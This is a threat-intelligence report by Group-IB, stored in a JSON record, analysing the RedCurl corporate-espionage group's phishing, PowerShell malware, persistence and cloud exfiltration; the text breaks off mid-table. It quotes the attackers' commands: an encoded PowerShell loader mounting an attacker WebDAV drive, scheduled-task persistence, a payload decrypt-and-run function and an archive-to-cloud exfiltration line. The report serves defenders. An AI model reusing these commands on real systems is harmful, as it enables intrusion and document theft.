{
	"id": "f2d4b7ca-43c2-49ec-b616-5abc15f7ab5d",
	"created_at": "2026-05-05T02:45:36.644787Z",
	"updated_at": "2026-05-05T02:46:36.971093Z",
	"deleted_at": null,
	"sha1_hash": "bbc72124ae50a0e2bdcac05d845716b8f11699af",
	"title": "",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9523447,
	"plain_text": "REDCURL\r\nThe pentest you didn’t know about\r\ngroup-ib.com\r\nAUGUST 2020\n\nREDCURL: THE PENTEST YOU DIDN’T KNOW ABOUT © GROUP−IB\r\n© Group−IB, 2020\r\nRestrictions\r\n1. The report was written by Group-IB experts without any third-party funding.\r\n2. The report provides information on the tactics, tools, and infrastructure of the previously unknown group RedCurl. The report’s goal is to minimize the risk of the group committing further illegal acts, suppress any such activity in a timely manner, and raise awareness among readers. The report also contains indicators of compromise that organizations and specialists can use to check their networks for compromise, as well as recommendations on how to protect against future attacks. Technical details about threats are provided solely for information security specialists so that they can familiarize themselves with them, prevent similar incidents from occurring in the future, and minimize potential damage. The technical details about threats outlined in the report are not intended to advocate fraud or other illegal activities in the field of high technologies or any other fields.\r\n3. The report is for information purposes only and is limited in distribution. Readers are not authorized to use it for commercial purposes and any other purposes not related to education or personal non-commercial use. Group-IB grants readers the right to use the report worldwide by downloading, reviewing, and quoting it to the extent justified by legitimate citation, provided that the report itself (including a link to the copyright holder’s website on which it is published) is given as the source of the quote.\r\n4. The entire report is subject to copyright and protected by applicable intellectual property law. 
It is prohibited to copy, distribute (including by placing on websites), or use the information or other content without the right owner’s prior written consent.\r\nIf Group-IB’s copyright is violated, Group-IB will have the right to approach a court or other state institution to protect its rights and interests and seek punishment for the perpetrator as provided by law, including recovery of damages.\n\nContents\r\nIntroduction 4\r\nKey findings 6\r\nGeographical scope and targets 8\r\nInitial access 9\r\nTrojan execution and persistence in the system 13\r\nReconnaissance and lateral movement 15\r\nData exfiltration 18\r\nTools 19\r\nInitialDropper 20\r\nDropper 21\r\nFirstStageAgent aka FSA 22\r\nChannel1 aka RedCurl.C1 and Channel2 aka RedCurl.C2 26\r\nCommands 26\r\nAttribution 29\r\nRedCurl, CloudAtlas and RedOctober: campaign comparison 30\r\nMITRE ATT\u0026CK® Mapping (RedCurl) 31\r\nMITRE ATT\u0026CK® Mapping (RedOctober/Cloud Atlas/Inception) 33\r\nIoCs 35\r\nAppendix 1. Cloud accounts* –\r\nAppendix 2. Examples of FSA, C1, and C2 52\r\nRecommendations 55\r\n* The chapter is available in the full version only\n\nIntroduction\r\nOne summer evening in 2019, Group-IB’s Computer Emergency Response Team (CERT-GIB) received a call from a new customer who said that their company had been attacked. They asked for help in eliminating the incident’s aftermath and identifying the hacker group responsible.\r\nThe duty CERT-GIB analyst examined the phishing email used at the initial infection stage. It was particularly well-written, which suggested that this was a planned targeted attack. 
The unique behavioral fingerprint, obtained as a result of dynamic analysis in TDS Polygon, a Group-IB Threat Hunting Framework module, confirmed the analyst’s hypothesis. The analyst immediately notified Group-IB’s Threat Intelligence \u0026 Attribution team about the incident, and within a couple of hours the customer was informed about the targeted attack against their business.\r\nMeanwhile, the email sample and the attack details caught the attention of Group-IB’s Threat Intelligence \u0026 Attribution specialists. The campaign conducted by the hacker group (unknown at the time) involved unique tools written in PowerShell, which is popular among IT specialists. Moreover, the emails targeted a specific team within the victim organization rather than the organization as a whole. It became obvious that it was not an ordinary cybercriminal group seeking to steal money. Group-IB specialists’ findings confirmed earlier forecasts made in the analytical report “Hi-Tech Crime Trends 2019/2020”: namely that espionage- and sabotage-oriented APT groups had come to play an increasingly prominent role on the hacker scene. One such group was the one in question: RedCurl.\r\nIn each analyzed campaign, the group’s goal was to conduct espionage. The attackers infected computers in targeted departments within organizations and stole specific documents. One of the group’s possible victims was an employee at a cybersecurity company that protects its customers against such attacks. Detected incidents related to this threat group took place in various industries and had a wide geographical scope: from Russia to North America. As such, it is likely that the attacks were ordered for the purpose of corporate espionage. 
This hypothesis is reinforced by the fact that the group acted as covertly as possible in order to minimize the risk of being discovered on the victim’s network. For instance, RedCurl did not use actively communicating Trojans or remote administration tools with a graphical interface.\r\nIt should also be noted that RedCurl uses techniques similar to those used by Red Teaming and penetration testing specialists.\r\nRedCurl: a cyber espionage hacker group. The group’s goal is to conduct corporate espionage: steal documents containing commercially sensitive information and employees’ personal data.\r\nTools: the group acted as covertly as possible to minimize the risk of being discovered on the victim’s network: RedCurl did not use actively communicating Trojans or remote administration tools.\n\nThis report contains the first ever descriptions of the tactics, tools, and infrastructure of RedCurl, a previously unknown group. In addition, this paper includes the first ever details about the group’s kill chain, which were prepared by specialists at Group-IB’s Digital Forensics Lab, as well as unique data collected during incident response operations related to campaigns attributed to RedCurl.\r\nAs part of their research, Group-IB’s digital forensics experts verified the hypothesis that the techniques used by RedCurl are similar to those involved in the RedOctober and CloudAtlas campaigns, whose goal is also espionage. An in-depth analysis based on the MITRE ATT\u0026CK® matrix did not reveal unambiguous links between these campaigns, however.\r\nIndicators of compromise are given at the end of the report as usual, excluding the ones that can lead to the identification of RedCurl’s victims. 
YARA and Suricata rules, however, are only available to Group-IB Threat Intelligence \u0026 Attribution customers.\r\nTraditionally, the report features recommendations from Group-IB experts on preventive measures to help protect against the group’s attacks.\n\nKey findings\r\nName: RedCurl (given by Group-IB)\r\nGoal: Corporate espionage and theft of documents\r\nActive: 2018 to present. Over more than two years, Group-IB has detected 26 targeted attacks\r\nGeography: Russia, Ukraine, Canada, Germany, the United Kingdom, Norway\r\nVictims: Construction companies, financial and consulting companies, retailers, banks, insurance companies, law firms, travel agencies\r\nLanguage: The group is presumably Russian-speaking\r\nTools: RedCurl created a set of PowerShell programs that can cumulatively be called a framework and that includes:\r\n• Droppers (including an initial dropper, InitialDropper)\r\n• Key module FirstStageAgent (aka FSA)\r\n• Two submodules called Channel1 (aka FSA.C1) and Channel2 (aka FSA.C2)\r\nFigure 1. Trojan unpacking diagram\r\nThe Trojan receives commands from its operator through a cloud in the form of BAT scripts, which are simply subprograms. A total of 29 such command programs were identified.\n\nFigure 2. Diagram of Trojan-operator interactions through the cloud\r\nThe group’s technical characteristics\r\n• Minimal use of binary code.\r\n• Use of anti-detection techniques.\r\n• Control over an infected computer through commands kept in a legitimate cloud storage. The commands are sent as PowerShell scripts.\r\n• Special scripts for displaying fake Outlook windows to intercept the logins and passwords of targeted individuals.\r\n• The group usually remains in the victim’s network for two to six months. 
The stage of spreading over the network is stretched over a long time to remain unnoticed for as long as possible. To achieve this, the group does not use any actively communicating Trojans or remote-control tools via RDP.\r\nTarget system: The main targets include office documents and emails.\r\nExfiltration of data to legitimate cloud storage: RedCurl uses cloud services such as cloudme.com, koofr.net, pcloud.com, idata.uz, drivehq.com, driveonweb.de, opendrive.com, powerfolder.com, docs.live.net, syncwerk.cloud, cloud.woelkli.com, and framagenda.org. To manage and access clouds, the threat actors use the service multcloud.com.\n\nGeographical scope and targets\r\nAll RedCurl attacks are targeted, i.e. emails and droppers are tailored to specific victims, which makes it possible to identify targets. Not all the victims have been identified, however. In some cases, only malware modules were discovered (rather than the initial dropper, which can reveal the target).\r\nSince 2018, Group-IB has detected 26 attacks against targets in various industries, including:\r\n• Construction companies\r\n• Retailers\r\n• Travel agencies\r\n• Insurance companies\r\n• Financial companies\r\n• Banks\r\n• Law and consulting firms\r\nThe geographical scope of RedCurl attacks includes Europe, the post-Soviet region, and North America. The victims of the 26 attacks detected are located in:\r\n• Russia\r\n• Ukraine\r\n• Canada\r\n• Germany\r\n• The United Kingdom\r\n• Norway\r\nGroup-IB identified 14 organizations that have become victims of RedCurl’s espionage attacks, some on several occasions. Group-IB specialists contacted each of them and provided recommendations on further steps to eliminate the consequences of the attacks. Names of victims are not disclosed. 
At the time of writing, some of the companies continue to respond to the incidents.\r\nAnalysis of the customer’s compromised data revealed a set of data relating to a team lead at a cybersecurity company. The IP addresses that communicated with RedCurl’s cloud belong to the company in question. It is impossible to determine whether this data was compromised or whether this was an instance of controlled analysis of the Trojan by researchers.\r\nFigure 3. Timeline of RedCurl attacks\n\nInitial access\r\nAs is the case with many espionage campaigns, initial access to targeted infrastructures in RedCurl attacks involves spear-phishing emails. RedCurl’s distinctive feature, however, is that the email content is carefully drafted. For instance, the emails displayed the targeted company’s address and logo, while the sender address featured the company’s domain name.\r\nThe attackers posed as members of the HR team at the targeted organization and sent out emails to multiple employees at once, which made the employees less vigilant, especially considering that many of them worked in the same department.\r\nTo deliver the payload, RedCurl used archives, links to which were placed in the email body. Despite the fact that the links redirected to public cloud storage services, the way they were disguised tricked users into thinking that they were visiting the company’s official website:\r\nFigure 4. Example of a spear-phishing email sent by RedCurl\r\nSpear-phishing emails were used by the group to get initial access to targeted companies.\n\nFigure 5. Example of a spear-phishing email sent by RedCurl\r\nFigure 6. 
Technical records of the domain mailsecure[.]tech\r\nThe phishing emails were sent using the domain name mailsecure[.]tech, and more specifically subdomains that imitated the target organization’s legitimate domain. The specified domain name had been registered six months before the campaign was launched, on December 6, 2018. On the day of the attack, the SOA record was changed and Yandex was specified for the MX record:\n\nNaturally, the websites belonging to the targeted organizations did not host the archive, which was stored in the cloud, most often Dropbox. In addition to Dropbox, RedCurl’s campaigns also involved free hosting services, especially Byethost and AttractSoft:\r\nhttp://********.byethost22.com/3/%D0%9F%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BE%20%D0%B5%D0%B6%D0%B5%D0%B3%D0%BE%D0%B4%D0%BD%D0%BE%D0%BC%20%D0%BF%D1%80%D0%B5%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B8%20%D1%81%D0%BE%D1%82%D1%80%D1%83%D0%BD%D0%B8%D0%BA%D0%BE%D0%B2.7z\r\nhttp://********.byethost7.com/dl/********.7z\r\nhttp://logs99.atwebpages.com/********/reports/002838177363613567218367647/actual/report.php\r\nhttp://mtpon34.myartsonline.com/report/2890000027835616636545613/actual/report.php\r\nAttacks carried out in 2020 involved LNK and XLAM files. The latter are add-in files for Excel 2010 and Excel 2007 based on XML with support for macros. 
As victims interacted with these files, an attacker-controlled cloud storage was set up on the local system as a network drive, RedCurl.Dropper, which was hosted there, was launched, and a phishing document was then displayed to the victim.\r\nIn the attacks observed in 2019, victims downloaded an archive with an EXE file, which was an SFX (self-extracting) archive. Launching this file extracted and launched RedCurl.Dropper. The launched file had a PDF or Microsoft Word icon, which meant that if showing file extensions was disabled on the victim’s computer, there was a good chance that the file would not raise any suspicions.\r\nIn RedCurl’s earlier campaigns carried out in 2018, the utility NirCmd was extracted from the SFX archive. NirCmd was used to launch the module FirstStageAgent_light. In addition to the SFX archive, RedCurl used MHT files, which were HTML pages with resources necessary for displaying the contents correctly. When such a file was opened in the browser, the user was asked to allow interaction between ActiveX and parts of the web page:\r\nFigure 7. Example of a downloaded file with the extension made invisible\r\nFigure 8. MHT InitialDropper\r\nLNK and XLAM files (2020) and EXE files (2019) launched RedCurl.Dropper on the victim’s computer.\n\nIn the case of an MHT file, RedCurl.FirstStageAgent was launched using Windows PowerShell. In addition, the contents of the phishing document or web page were displayed.\r\nRedCurl.FirstStageAgent was distributed in a similar way, using JavaScript. When it was launched, the victim was shown a legitimate web page that asked them to download, install, or re-install Microsoft 365 or Office 2019. A detailed description of RedCurl’s toolset can be found in the “Tools” section.\r\nFigure 9. 
Types of Trojans in 2018, 2019, and 2020\n\nTrojan execution and persistence in the system\r\nThe vast majority of tools used in RedCurl campaigns are Windows PowerShell scripts. For instance, a PowerShell script was used to launch RedCurl.Dropper and set up cloud storage as a network drive. Below is one such example:\r\npowershell.exe -enc \"JgAgACIAcgB1AG4AZABsAGwAMwAyAC4AZQB4AGUAIgAgAEAAKAAiAHMAZABtADUALgBkAGwAbAAsAG8AQgBTAGkAUQBTAFUASQBTAHIAUwB5AE4AYQBJAGEAagBQAHAAaQBWAFUAUQBCAE0AZwBBACIAKQA7ACAAbgBlAHQAIAB1AHMAZQAgAGgAdAB0AHAAcwA6AC8ALwBhAHAAcAAuAGsAbwBvAGYAcgAuAG4AZQB0AC8AZABhAHYAIABuADYAegByAHMAcwA5AGQAbwBxAG8AagA2AGkAdQAxACAALwB1AHMAZQByADoAZgBvAHkAdQBiAEAAdABoAGUAdABlAG0AcABtAGEAaQBsAC4AYwBvAG0AOwAgAG4AZQB0ACAAdQBzAGUAIABcAFwAYQBwAHAALgBrAG8AbwBmAHIALgBuAGUAdABAAFMAUwBMAFwAZABhAHYAIAAvAEQARQBMAEUAVABFADsA\"\r\nDecoded (password redacted), the command runs:\r\n\"rundll32.exe\" @(\"sdm5.dll,oBSiQSUISrSyNaIajPpiVUQBMgA\");\r\nnet use https://app.koofr.net/dav PASSWORD /user:foyub@thetempmail.com;\r\nnet use \\\\app.koofr.net@SSL\\dav /DELETE;\r\nThe above script is saved in a batch file and launched after the phishing SFX archive is opened using a VBScript script. Module persistence is sometimes established during the SFX archive opening stage. In such cases, a shortcut with a module launch command is created in the Startup directory.\r\nRedCurl.Dropper, which is a library, is launched using rundll32.exe. RedCurl.FSA and the additional modules RedCurl.FSA.C1 and RedCurl.FSA.C2, on the other hand, are extracted from a CAB archive.\r\nIn earlier attacks that took place in 2018, the additional modules Channel1 and Channel2 were downloaded from the cloud. 
In the most recent attacks, the modules were located in the same CAB archive as FirstStageAgent, while RedCurl.Dropper itself was launched from a network drive set up during the initial access stage.\r\nThese tools helped the attackers download additional PowerShell scripts (as well as other tools necessary for achieving specific goals) from cloud storage spaces and execute them. A detailed description of the main and additional modules can be found in the “Tools” section.\r\nPersistence for both the main and additional modules was established by creating scheduled tasks:\r\n/c schtasks /Create /TN \"LicenseAcquisitionService\\EnableLicenseAcquisitionTask\" /SC hourly /ST 02:26 /tr \"wscript.exe /B \\\"C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\EnableLicenseAcquisitionS\\EnableLicenseAcquisitionF.vbs\\\"\" /F\n\nIn earlier attacks, persistence was also ensured through the Run keys in the Registry:\r\nNew-ItemProperty -Path Registry::HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name MicrosoftCurrentUpdatesCheck -Value \"\"\"$Channel1Dir\\check.exe\"\" loop 65000 3600000 execmd \"\"cd \"\"$Channel1Dir\"\" \u0026\u0026 call check.bat\"\"\" -Force | Out-Null\r\nThe names of both scheduled tasks and Registry keys were designed in such a way as to make it extremely difficult to distinguish them from legitimate operating system components and applications: MicrosoftCurrentUpdatesCheck, MDMMaintenenceTask, WindowsActionDialog, etc.\n\nReconnaissance and lateral movement\r\nAnalysis of RedCurl campaigns revealed that the group remains in the victim’s network for two to six months on average. 
The stage of spreading over the network is significantly extended in time as the group strives to remain unnoticed for as long as possible and does not use any active Trojans that could disclose its presence.\r\nBy using Windows PowerShell scripts and legitimate cloud services, RedCurl reduced detections of the tools they used to the minimum. As part of incident response operations, Group-IB specialists observed antivirus software being triggered by RedCurl.Dropper, but this occurred only after the malware had been in the system for several months.\r\nThe attackers also used Windows PowerShell scripts to collect information about the compromised system as well as about local and network drives. The same scripts were also used to collect information about email accounts that could later be used for a new round of phishing campaigns.\r\nFor 2 to 6 months RedCurl remains in the victim’s network.\r\nAs part of its campaigns, RedCurl used ADExplorer from the Sysinternals Suite to collect information about Active Directory. Although this tool is intended for working with a graphical interface, the snapshot option makes it possible to launch it from the command line and save a copy of the Active Directory database to a file.\n\nIn RedCurl campaigns, movement across the network was ensured using modified LNK files (shortcuts), which were placed in network drives.\r\nUnlike many other espionage groups, RedCurl does not seek to gain access to systems using the Remote Desktop Protocol or similar. 
Instead, the group sticks to tools with a command line interface, using SSH for interactive access, for example.\r\nBy using a Windows PowerShell script, the attackers created LNK shortcuts for *.jpg, *.pdf, *.doc, *.docx, *.xls, and *.xlsx files hosted on network drives and turned on the “hidden” attribute for the original files. By merely opening a target file, the unsuspecting victim would launch RedCurl.Dropper together with it.\r\nRedCurl.Dropper was also copied to the directory where the files were located on the network drive. Although this propagation method is “low and slow,” it helps threat actors successfully bypass certain security systems.\r\nLNK files were used by RedCurl to substitute *.jpg, *.pdf, *.doc, *.docx, *.xls, and *.xlsx files. By opening such a file, the victim would launch RedCurl.Dropper.\n\nOn account of this particular characteristic of LNK files, specialists at Group-IB’s Digital Forensics Lab were able to determine that these files had been opened by analyzing UserAssist, a source of artifacts traditionally used to search for traces of executable file launches and which normally does not contain such traces.\r\nIn addition to Windows PowerShell scripts, RedCurl’s arsenal includes other tools. To harvest credentials, for instance, the attackers use an increasingly popular tool called LaZagne, which helps extract passwords not only from memory but also from files, such as those saved in the victim’s browser. This tool is written in Python and is delivered to compromised hosts together with the Python interpreter. 
To reduce the likelihood of LaZagne being detected, the attackers used PyArmor, which helped obfuscate its code.\r\nLaZagne: the tool used by RedCurl to extract passwords not only from memory but also from files, such as those saved in the victim’s browser.\r\nMoreover, a PowerShell script that displayed a phishing pop-up Microsoft Outlook window to the victim was used to collect authentication data.\r\nCredentials entered by the user were saved to a text file and then checked for validity. This way, if a targeted organization did not have multi-factor authentication in place, the attackers could gain access to compromised users’ email accounts even if the required data was not obtained through LaZagne.\r\nPyArmor: used by RedCurl to reduce the likelihood of RedCurl.Dropper being detected and obfuscate its code.\n\nData exfiltration\r\nRedCurl focuses on compromising email. The attackers had a Windows PowerShell script in their arsenal to exfiltrate and copy emails.\r\nApart from scripts, in some cases the hackers also used other tools to upload files to cloud services. In particular, they used the megatools set of utilities to upload data to Mega, a file storage service.\r\nThe hackers searched both local drives and corporate network storages for documents of interest. 
Among the stolen files were:\r\n• Employee personnel files\r\n• Construction documentation\r\n• Legal action documents\r\n• Internal documents\n\nTools\r\nThe entire set of the group’s custom tools is written in PowerShell. When these tools are in operation, third-party programs are additionally downloaded, including ones written in Python.\r\nRedCurl’s custom tools include:\r\n• RedCurl.InitialDropper\r\n• RedCurl.Dropper\r\n• RedCurl.FSA aka FirstStageAgent\r\n• RedCurl.FSA.C1 + RedCurl.FSA.C2\r\n• RedCurl.Commands\r\nFigure 10. Diagram showing FSA with its modules and commands\n\nInitialDropper\r\nThe initial dropper RedCurl.InitialDropper is a regular SFXRAR or 7z archive with a PDF icon. This has not always been the case, however. Analysis of historical data revealed:\r\n• VBS_Dropper, a VBS script\r\n• XLAM_Dropper, an MS Office add-in file\r\n• LNK_Dropper, an MS Windows shortcut\r\nLaunching it will unpack a decoy document, a malicious DLL library called RedCurl.Dropper, a VBS script, and a BAT command shell script.\r\nThe user will be shown the decoy document while the system utility wscript.exe executes the extracted VBS script, which launches the cmd.exe command line interpreter and the extracted BAT script.\r\nFigure 11. Contents of SFX InitialDropper\r\nFigure 12. 
SFX InitialDropper diagram\r\nThis will result in the launch of a PowerShell script that will set up a cloud storage as a network drive using the system utility net.exe:\r\nnet use \\\\app.koofr.net@SSL\\dav /DELETE;\r\nnet use https://app.koofr.net/dav PASSWORD /user:foyub@thetempmail.com;\r\nNext, the script will use the system utility rundll32.exe to launch the dropper as the malicious library RedCurl.Dropper:\r\n\"rundll32.exe\" @(\"sdm5.dll,oBSiQSUISrSyNaIajPpiVUQBMgA\");\n\nDropper\r\nWhen Dropper is launched, tasks are created, which ensures the persistence of the key module RedCurl.FSA and the two “channels,” RedCurl.FSA.C1 and RedCurl.FSA.C2.\r\nC:\\Windows\\System32\\cmd.exe /c schtasks /Create /TN \"WsSwapAssessmentTask\" /SC hourly /MO 4 /ST 00:20 /tr \"wscript.exe /B \\\"C:\\Users\\John\\AppData\\Local\\Microsoft\\WsSwapAssessmentTaskF\\WsSwapAssessmentTaskS.vbs\\\"\" /F\r\nC:\\Windows\\System32\\cmd.exe /c schtasks /Create /TN \"IndexerAutomaticMaintenance\\IndexerAutomaticMaintenanceTask\" /SC hourly /ST 01:38 /tr \"wscript.exe /B \\\"C:\\Users\\John\\AppData\\Roaming\\IndexerAutomaticMaintenanceF\\IndexerAutomaticMaintenance.vbs\\\"\" /F\r\nC:\\Windows\\System32\\cmd.exe /c schtasks /Create /TN \"LicenseAcquisitionService\\EnableLicenseAcquisitionTask\" /SC hourly /ST 02:13 /tr \"wscript.exe /B \\\"C:\\Users\\John\\AppData\\Roaming\\Microsoft\\EnableLicenseAcquisitionS\\EnableLicenseAcquisitionF.vbs\\\"\" /F\r\nThe program then extracts and saves a CAB archive to the disk, creates a new directory, and unpacks the contents of the CAB archive into that directory.\r\nThe archive contains the 7-Zip utility, which has traditionally been used to create and unpack archives. All command modules are encrypted using 7-Zip, which is also actively used by RedCurl’s Trojan. 
The archive also contains a utility called curl, which sends requests and ensures communication with the C\u0026C server.\r\nFigure 13. Contents of the CAB file\n\nFirstStageAgent aka FSA\r\nFirstStageAgent is designed to perform the following functions:\r\n1. Extract the modules RedCurl.Channel1 and RedCurl.Channel2.\r\n2. Upload information about the infected machine.\r\n3. Download and execute a new command (module).\r\nThe FSA key module connects to the cloud service to upload data and obtain commands. The commands are sent as BAT scripts, the body of which usually contains a PowerShell script or an encoded executable file and launch instructions.\n\nSteps of the FSA operation algorithm (from the diagram):\r\n• Download of a module with commands\r\n• Launch of a decrypted version of the BAT file using a VBS script (this step may be omitted)\r\n• Launch of the BAT file\r\n• Launch of the main part of the module\r\nAlong with the FSA key module, two auxiliary modules are installed: FSA.Channel1 aka C1 and FSA.Channel2 aka C2. They act in the same way as the key module, but they use different accounts to communicate with the cloud.\r\nRedCurl uses cloud services such as cloudme.com, koofr.net, pcloud.com, idata.uz, drivehq.com, driveonweb.de, opendrive.com, powerfolder.com, and docs.live.net.\r\nThe modules RedCurl.Channel1 and RedCurl.Channel2 are stored in password-protected archives. The key for the archives is contained in an encrypted FirstStageAgent file. During the first start, FirstStageAgent extracts the contents of the archives using the “syspack.exe” utility. If the operation is successful, the “syspack.exe”, “7za.dll”, and “curl.exe” files are copied to the directory with the modules. 
Examples of commands for extracting content from archives are presented below:\r\n.\\syspack.exe x -aoa -p${fPass} $Channel1_path -o${Channel1Dir};\r\n.\\syspack.exe x -aoa -p${fPass} $Channel2_path -o${Channel2Dir};\r\nThe program communicates with operators by reading and writing to files located in the cloud storage. To interact with the cloud, FirstStageAgent uses the WebDAV technology, which allows for operations with files over the HTTP protocol. Requests to the cloud are performed using the “curl.exe” utility. FirstStageAgent first checks for proxy settings. If found, the settings are used to make requests to the cloud.\r\nFigure 14. FSA operation algorithm\n\nAll downloads from and uploads to the cloud are carried out using the curl utility. Prior to sending, data is encrypted using the 7-Zip utility.\r\nBefore obtaining commands, FirstStageAgent logs the start time. To do so, the program adds the username as well as the current date and time to the end of the file “SYS\\${env:computername}.[jpg|txt]” located on the cloud service. The message is formed by the command “${env:username}_$(Get-Date -Format g)”. To perform the above actions, FirstStageAgent takes the following steps:\r\n1. Downloads the file “SYS\\${env:computername}.[jpg|txt]” to the folder with the module.\r\n2. Adds the username as well as the current time and date to the end of the file.\r\n3. Deletes the file “SYS\\${env:computername}.[jpg|txt]” from the cloud.\r\n4. Downloads the modified file “SYS\\${env:computername}.[jpg|txt]”.\r\n5. Removes the downloaded file from the system.\r\nIt is worth noting that modules are stored on the infected system in encrypted form. The modules are encrypted using the ConvertTo-SecureString function based on the AES algorithm. A random sequence of bytes is used as a key. 
The decryption key is always new for each attack and each module.\r\nFigure 15. Diagram of Trojan-operator interactions through the cloud (diagram labels: info, commands, check, exfiltration)\r\n\r\nThe final stage of FirstStageAgent’s operation is to check for the file “enc/cmd.txt”, which contains a new module with commands. The file stored on the server is a System.Security.SecureString object. The ConvertTo-SecureString method is used to decrypt the module. The decryption key is located within the FirstStageAgent file. Analysis revealed that a new encryption key is generated for each attack. Apart from encryption, the data is Base64-encoded. Below is a code section responsible for decryption:\r\nfunction Decrypt-CMD([BYTE[]] $key) {\r\n    # Path of the encrypted module downloaded from the cloud (enc/cmd.txt)\r\n    $path = \".\\tempexec\\cmd.txt\";\r\n    # Random 8-character name matching [a-z0-9]{8} for the decrypted BAT file\r\n    $cmdname = -join ((48..57) + (97..122) | Get-Random -Count 8 | % {[char]$_});\r\n    # The file holds an AES-encrypted SecureString; $key is the AES key\r\n    $dec = Get-Content $path | ConvertTo-SecureString -Key $key;\r\n    # Copy the plaintext out of the SecureString via unmanaged memory, then zero and free it\r\n    $Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($dec);\r\n    $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr);\r\n    [System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr);\r\n    # The plaintext is Base64; decode it and write the raw bytes as the BAT module\r\n    $bytes = [Convert]::FromBase64String($result);\r\n    $bytes | Set-Content \".\\tempexec\\${cmdname}.bat\" -Encoding Byte -Force;\r\n    Start-Sleep 10;\r\n    # Remove the encrypted copy and return the name of the decrypted module\r\n    Remove-Item .\\tempexec\\cmd.txt -Force;\r\n    return $cmdname;\r\n}\r\nThe file “enc/cmd.txt” is downloaded to the “.\\tempexec” directory, from which the FirstStageAgent module is launched. The module decryption function reads the contents of the downloaded file and decrypts it using the above algorithm (ConvertTo-SecureString -\u003e Base64). The decrypted module is written to the same directory. A random sequence of 8 characters is generated as a name (example: “[a-z0-9]{8}.bat”). 
At the last stage of its operation, FirstStageAgent deletes the downloaded file from the system and runs the decrypted file.\r\nAfter execution, all commands (modules) and created files are deleted using the sdelete utility.\r\nAs such, all communications between the threat actor and the compromised infrastructure are carried out using legitimate cloud services.\r\n\r\nChannel1 (aka RedCurl.C1) and Channel2 (aka RedCurl.C2)\r\nCommands\r\nThe modules Channel1 and Channel2 have the same functions. Their main goal is to upload information about the infected device, then download and execute a new module with commands. The encryption method and the algorithm for receiving and sending data are the same as for FirstStageAgent. Each module uses different accounts to access the cloud storage.\r\nThe main difference between the modules is the way they communicate with the cloud storage. Channel1 and FirstStageAgent use the “curl.exe” utility to interact with the cloud, while Channel2 mounts a network drive in the system. Mounting is carried out using the “net.exe” utility, and all subsequent operations with files located in the cloud are performed using console commands. An example of a command used to mount a network drive is presented below:\r\nnet use https://storage.driveonweb.de/probdav $pass /user:$login /persistent:no;\r\nAnother feature that distinguishes Channel2 from Channel1 is the way it launches the decrypted module with commands. Channel2 uses a VBS script that is run by the common program “wscript.exe”. The path to the module is passed as an argument. Once the script is run, a “WScript.Shell” object is created, which is then used to launch the decrypted BAT file. 
An example of the VBS script is presented below:\r\nOn Error Resume Next\r\n' Launch the file whose path is passed as the first argument (the decrypted BAT file) with a hidden window (0), without waiting for it to finish (False)\r\nCreateObject(\"Wscript.Shell\").Run \"\"\"\" \u0026 WScript.Arguments(0) \u0026 \"\"\"\", 0, False\r\nChannel1 launches the decrypted module in the same way as FirstStageAgent.\r\nThe FirstStageAgent, Channel1, and Channel2 modules only download and execute commands (modules) in the “cmd.exe” command-line interpreter. Each downloaded file is a separate module with commands that extend the Trojan’s functionality. This means that these Trojan commands are subprograms or modules.\r\nCertain modules can execute PowerShell commands. In such cases, the commands are Base64-encoded and stored in the file with the module. Modules can contain commands to download additional software.\r\nThe downloaded modules communicate with operators using files located in the cloud. Additional programs required for the Trojan to operate are located in the cloud directory. It is worth noting that different accounts are used in the modules that store commands and the modules that run commands. However, different modules with commands use the same account. The same module can run on different machines. Modules check the name of the computer on which they are running to avoid restarting on the same machine. If the computer name matches one of the values on the list, the module will continue with the execution.\r\n\r\nEach module starts by creating a temporary directory to save the result of its operation. The directory that stores the module that launched the command is used as the working directory. The directory name is located in the file with the downloaded module. In the modules analyzed, the directory names are based on the following pattern: “temp[0-9]{2,4}”.\r\nThe output of each command is added to a password-protected archive. 
To create the archive, a console version of the 7-Zip program (syspack.exe) is used. The program is delivered to the infected device in advance. The password for the archive is contained in the file and is unique for each module. After files have been added to the archive, they are removed from the system. The archive name is generated using the following template:\r\n%computername%_%username%_%%CMD_NAME%%_[%random%]_[%DD%%MM%|%MM%%DD%]_%HH%%MM%.tmp\r\nThe month and day will be determined correctly only if the “DD.MM.YYYY” or “MM.DD.YYYY” date format is set in the system. The %random% field may be missing in some cases. The %CMD_NAME% field depends on the module’s purpose. An example of a command used to create an archive is presented below:\r\nsyspack.exe a -p%packpass% -mhe=on -sdel -y \\\\app.koofr.net@SSL\\dav\\Koofr\\STR\\%ARCH_NAME% %LOG_FOLDER%\r\nIn this command, the 7-Zip switch -mhe=on encrypts the archive headers as well as the contents, and -sdel deletes the source files once they have been added to the archive.\r\nModules were named based on the value of the %CMD_NAME% field. Below is a list of the detected modules:\r\nModule | Description\r\ninf | Collects information about the infected system\r\ndom, d1 | Collects information from Active Directory\r\ndn, mlist | Collects information about users in Active Directory\r\nps | Harvests credentials from the infected machine using LaZagne\r\nsh | Collects logs from the infected machine. 
In some cases, it determines the contents of a directory located on the local network\r\ndnlog | Collects a list of computers on the local network\r\nins, inst | Infects files on shared resources within the network\r\nunins | Removes files intended for distribution within the network\r\nshares | Obtains a list of available network drives at the address\r\ncheck, chk | Checks access to the network drive and obtains a file list\r\ndl, difs, difs2 | Obtains a list of files on a network drive\r\nml | Exfiltrates emails\r\nmi01 | Launches a DLL file\r\ndepmpunins | Removes traces of compromise from the infected machine\r\np1, plz232 | Collects system information along with credentials\r\nfs01 | Obtains a list of files in a directory on a network drive\r\nfs02 | Checks the internet connection\r\nustunlog | Configures access to the infected machine via SSH\r\ndl1 | Exfiltrates data\r\nch2, tmp | Obtains a list of files from temporary directories of other modules\r\nsha | Obtains a list of available resources for computers within the local network\r\ncre | Creates a fake window for entering the computer account password\r\ncreds | Same as the cre module\r\nfld | Exfiltrates data from local and network directories\r\nres | Obtains a list of files stored on the local computer\r\nrf | Obtains attributes of files located on a network drive\r\n2 | Alive\r\nflg | Exfiltrates certain files from network directories\r\nwrf | Collects a list of directories on 